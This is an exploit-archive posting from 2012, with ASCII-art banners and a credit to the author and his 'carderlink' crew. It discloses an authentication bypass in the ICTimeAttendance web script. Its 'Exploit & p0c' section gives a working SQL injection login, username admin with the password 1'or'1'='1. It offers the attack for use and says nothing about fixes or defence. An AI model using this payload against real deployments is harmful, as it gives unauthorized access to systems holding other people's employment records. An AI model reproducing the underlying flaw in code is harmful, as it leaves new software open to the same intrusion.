[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ICTimeAttendance Authentication Bypass Vulnerability
# Published : 2012-01-20
# Author :
# Previous Title : SocialCMS CSRF Vulnerability
# Next Title : Fork CMS v.3.2.4 - Multiple Vulnerabilities ( LFI - XSS )
) ) ) ( ( ( ( ( ) )
( /(( /( ( ( /( ( ( ( ) )) ) ) )) ) ) ) ( /( ( /(
)())())) ) )()) ) ) ) (()/(()/( ( (()/(()/((()/( )()) )())
((_)((_)(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) ) /(_))(_))/(_))(_)|((_)
__ ((_)((_)/(_))___ ((_) _ ) )___) _ )(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)
/ / _ (_)) __ / (_)_(_)(/ __(_)_(_) _ | | __| _ | |_ _|| | | |/ /
V / (_) || (_ | V / / _ | (__ / _ | /| |) | _|| / |__ | | | .` | ' <
|_| ___/ ___| |_| /_/ _ ___/_/ _|_|_|___/|___|_|_____|___||_|_|_|_
.WEB.ID
-----------------------------------------------------------------------
ICTimeAttendance Authentication Bypass Vulnerability
-----------------------------------------------------------------------
Author : v3n0m
Site : http://yogyacarderlink.web.id/
Date : January, 19-2012
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
Application : ICTimeAttendance - Time attendance script
Price : $57.09
Vendor : http://www.icloudcenter.com/
Exploit & p0c
_____________
go to
http://domain.tld/[path]/index.html
then login with
Username : admin
Password : 1'or'1'='1
ShoutZ
______
All YOGYACARDERLINK CREW